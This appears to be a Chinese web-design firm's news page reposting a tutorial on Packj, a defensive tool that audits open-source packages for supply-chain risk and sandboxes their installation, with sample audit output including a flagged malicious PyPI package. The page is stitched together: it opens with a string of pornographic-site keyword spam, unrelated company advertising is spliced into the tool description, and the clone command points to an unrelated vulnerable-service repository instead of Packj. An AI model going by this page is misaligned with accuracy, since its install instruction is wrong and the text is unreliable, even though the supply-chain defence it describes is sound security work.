日本综合一区二区|亚洲中文天堂综合|日韩欧美自拍一区|男女精品天堂一区|欧美自拍第6页亚洲成人精品一区|亚洲黄色天堂一区二区成人|超碰91偷拍第一页|日韩av夜夜嗨中文字幕|久久蜜综合视频官网|精美人妻一区二区三区

RELATEED CONSULTING
相關(guān)咨詢
選擇下列產(chǎn)品馬上在線溝通
服務(wù)時間:8:30-17:00
你可能遇到了下面的問題
關(guān)閉右側(cè)工具欄

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案
如何使用Packj檢測惡意或高風(fēng)險的開源軟件包

關(guān)于Packj

Packj是一款功能強大的代碼安全檢測工具,該工具本質(zhì)上是一個命令行接口工具套件,可以幫助廣大研究人員檢測軟件代碼包中潛在的惡意或高風(fēng)險代碼,旨在緩解軟件供應(yīng)鏈攻擊。該工具支持識別當前熱門開源軟件管理工具中提供的軟件代碼包,比如說NPM、RubyGems和PyPI等。在該工具的幫助下,我們可以持續(xù)審查軟件包并獲取免費的風(fēng)險評估報告。

公司主營業(yè)務(wù):成都做網(wǎng)站、成都網(wǎng)站建設(shè)、成都外貿(mào)網(wǎng)站建設(shè)、移動網(wǎng)站開發(fā)等業(yè)務(wù)。幫助企業(yè)客戶真正實現(xiàn)互聯(lián)網(wǎng)宣傳,提高企業(yè)的競爭能力。創(chuàng)新互聯(lián)是一支青春激揚、勤奮敬業(yè)、活力青春激揚、勤奮敬業(yè)、活力澎湃、和諧高效的團隊。公司秉承以“開放、自由、嚴謹、自律”為核心的企業(yè)文化,感謝他們對我們的高要求,感謝他們從不同領(lǐng)域給我們帶來的挑戰(zhàn),讓我們激情的團隊有機會用頭腦與智慧不斷的給客戶帶來驚喜。創(chuàng)新互聯(lián)推出松桃免費做網(wǎng)站回饋大家。

工具下載

由于該工具基于Python 3開發(fā),因此我們首先需要在本地設(shè)備上安裝并配置好Python 3環(huán)境。接下來,使用下列命令將該項目源碼克隆至本地:

git clone https://github.com/anil-yelken/Vulnerable-Soap-Service.git

Packj提供了下列工具:

Audit:用于檢測軟件代碼包中的高位風(fēng)險屬性;

Sandbox:用于安全安裝軟件包的環(huán)境;

$ python3 main.py --help

usage: main [options] args

 

options:

    audit          Audit a package for malware/risky attributes

    sandbox        Sandbox package installation to mitigate risks

工具使用

審計一個代碼包

Packj可以審計開源軟件包的“高風(fēng)險”屬性,即可能會讓其容易受到供應(yīng)鏈攻擊的各種因素。比如說,包含過期電子郵件的包(缺少2FA)、發(fā)布時間間隔太長、敏感API或訪問權(quán)限問題等。

工具支持審計下列內(nèi)容:

多個軟件包:

python3 main.py -p pypi:requests rubygems:overcommit

依賴文件:

python3 main.py -f npm:package.json pypi:requirements.txt

我們還可以在一個Docker/Podman容器中執(zhí)行審計操作:

$ docker run -v /tmp:/tmp/packj -it ossillate/packj:latest audit --trace -p npm:browserify

 

[+] Fetching 'browserify' from npm...OK [ver 17.0.0]

[+] Checking version...ALERT [598 days old]

[+] Checking release history...OK [484 version(s)]

[+] Checking release time gap...OK [68 days since last release]

[+] Checking author...OK [mail@substack.net]

[+] Checking email/domain validity...ALERT [expired author email domain]

[+] Checking readme...OK [26838 bytes]

[+] Checking homepage...OK [https://github.com/browserify/browserify#readme]

[+] Checking downloads...OK [2.2M weekly]

[+] Checking repo_url URL...OK [https://github.com/browserify/browserify]

[+] Checking repo data...OK [stars: 14077, forks: 1236]

[+] Checking repo activity...OK [commits: 2290, contributors: 207, tags: 413]

[+] Checking for CVEs...OK [none found]

[+] Checking dependencies...ALERT [48 found]

[+] Downloading package 'browserify' (ver 17.0.0) from npm...OK [163.83 KB]

[+] Analyzing code...ALERT [needs 3 perms: process,file,codegen]

[+] Checking files/funcs...OK [429 files (383 .js), 744 funcs, LoC: 9.7K]

[+] Installing package and tracing code...OK [found ['process', 'files', 'network'] syscalls]

=============================================

[+] 5 risk(s) found, package is undesirable!

 

=> Complete report: /tmp/packj_54rbjhgm/report_npm-browserify-17.0.0_hlr1rhcz.json

{

    "undesirable": [

        "old package: 598 days old",

        "invalid or no author email: expired author email domain",

        "generates new code at runtime",

        "reads files and dirs",

        "forks or exits OS processes",

    ]

}

軟件包沙箱安裝

Packj提供了一個輕量級沙箱環(huán)境,可以用于安全地安裝和測試軟件包。具體而言,它可以防止惡意軟件包提取敏感數(shù)據(jù)、訪問敏感文件(如SSH密鑰)以及植入持久化惡意軟件等。操作命令如下:

$ python3 main.py sandbox gem install overcommit

 

Fetching: overcommit-0.59.1.gem (100%)

Install hooks by running `overcommit --install` in your Git repository

Successfully installed overcommit-0.59.1

Parsing documentation for overcommit-0.59.1

Installing ri documentation for overcommit-0.59.1

 

#############################

# Review summarized activity

#############################

 

[+] Network connections

[+] DNS (1 IPv4 addresses) at port 53 [rule: ALLOW]

[+] rubygems.org (4 IPv6 addresses) at port 443 [rule: IPv6 rules not supported]

[+] rubygems.org (4 IPv4 addresses) at port 443 [rule: ALLOW]

[+] Filesystem changes

/

└── home

    └── ubuntu

        └── .ruby

            ├── gems

            │   ├── iniparse-1.5.0 [new: DIR, 15 files, 46.6K bytes]

            │   ├── rexml-3.2.5 [new: DIR, 77 files, 455.6K bytes]

            │   ├── overcommit-0.59.1 [new: DIR, 252 files, 432.7K bytes]

            │   └── childprocess-4.1.0 [new: DIR, 57 files, 141.2K bytes]

            ├── cache

            │   ├── iniparse-1.5.0.gem [new: FILE, 16.4K bytes]

            │   ├── rexml-3.2.5.gem [new: FILE, 93.2K bytes]

            │   ├── childprocess-4.1.0.gem [new: FILE, 34.3K bytes]

            │   └── overcommit-0.59.1.gem [new: FILE, 84K bytes]

            ├── specifications

            │   ├── rexml-3.2.5.gemspec [new: FILE, 2.7K bytes]

            │   ├── overcommit-0.59.1.gemspec [new: FILE, 1.7K bytes]

            │   ├── childprocess-4.1.0.gemspec [new: FILE, 1.8K bytes]

            │   └── iniparse-1.5.0.gemspec [new: FILE, 1.3K bytes]

            ├── bin

            │   └── overcommit [new: FILE, 622 bytes]

            └── doc

                ├── iniparse-1.5.0

                │   └── ri [new: DIR, 119 files, 131.7K bytes]

                ├── rexml-3.2.5

                │   └── ri [new: DIR, 836 files, 841K bytes]

                ├── overcommit-0.59.1

                │   └── ri [new: DIR, 1046 files, 1.5M bytes]

                └── childprocess-4.1.0

                    └── ri [new: DIR, 272 files, 297.8K bytes]

 

[C]ommit all changes, [Q|q]uit & discard changes, [L|l]ist details:

惡意軟件檢測

在測試該工具的時候,我們成功地在PyPI上搜索出了40個惡意軟家包,其中有部分已經(jīng)被下架了:

$ python3 main.py audit pypi:krisqian

[+] Fetching 'krisqian' from pypi...OK [ver 0.0.7]

[+] Checking version...OK [256 days old]

[+] Checking release history...OK [7 version(s)]

[+] Checking release time gap...OK [1 days since last release]

[+] Checking author...OK [KrisWuQian@baidu.com]

[+] Checking email/domain validity...OK [KrisWuQian@baidu.com]

[+] Checking readme...ALERT [no readme]

[+] Checking homepage...OK [https://www.bilibili.com/bangumi/media/md140632]

[+] Checking downloads...OK [13 weekly]

[+] Checking repo_url URL...OK [None]

[+] Checking for CVEs...OK [none found]

[+] Checking dependencies...OK [none found]

[+] Downloading package 'KrisQian' (ver 0.0.7) from pypi...OK [1.94 KB]

[+] Analyzing code...ALERT [needs 3 perms: process,network,file]

[+] Checking files/funcs...OK [9 files (2 .py), 6 funcs, LoC: 184]

=============================================

[+] 6 risk(s) found, package is undesirable!

{

    "undesirable": [

        "no readme",

        "only 45 weekly downloads",

        "no source repo found",

        "generates new code at runtime",

        "fetches data over the network: ['KrisQian-0.0.7/setup.py:40', 'KrisQian-0.0.7/setup.py:50']",

        "reads files and dirs: ['KrisQian-0.0.7/setup.py:59', 'KrisQian-0.0.7/setup.py:70']"

    ]

}

=> Complete report: pypi-KrisQian-0.0.7.json

=> View pre-vetted package report at https://packj.dev/package/PyPi/KrisQian/0.0.7

其中,Packj將KrisQian(v0.0.7)標記為可疑,因為在包安裝期間(在setup.py中)缺少源代碼庫和使用敏感API(用于網(wǎng)絡(luò)通信、代碼生成)。經(jīng)過進一步研究和分析,我們驗證了這個代碼包確實是存在安全問題的。

許可證協(xié)議

本項目的開發(fā)與發(fā)布遵循AGPL-3.0開源許可證協(xié)議。

項目地址

Packj:【GitHub傳送門】

參考資料

https://packj.dev/

https://www.you*tube.com/watch?v=Rcuqn56uCDk

https://speakerdeck.com/ashishbijlani/pyconus22-slides

https://www.blackhat.com/asia-22/arsenal/schedule/#mitigating-open-source-software-supply-chain-attacks-26241

https://www.blackhat.com/us-22/arsenal/schedule/#detecting-typo-squatting-backdoored-abandoned-and-other-risky-open-source-packages-using-packj-28075

https://osseu2022.sched.com/overview/type/SupplyChainSecurityCon

https://nullcon.net/goa-2022/unearthing-malicious-and-other-risky-open-source-packages-using-packj

https://www.you*tube.com/watch?v=PHfN-NrUCoo?

https://speakerdeck.com/ashishbijlani/mitigating-open-source-software-supply-chain-attacks


網(wǎng)頁題目:如何使用Packj檢測惡意或高風(fēng)險的開源軟件包
URL網(wǎng)址:http://www.dlmjj.cn/article/dpschco.html